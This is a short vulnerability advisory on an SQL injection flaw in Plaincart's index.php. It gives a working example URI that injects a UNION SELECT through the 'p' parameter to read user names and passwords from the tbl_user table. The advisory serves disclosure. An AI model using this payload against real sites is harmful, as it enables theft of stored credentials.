Plaincart 'index.php' SQL Injection Vulnerability

Plaincart 'index.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--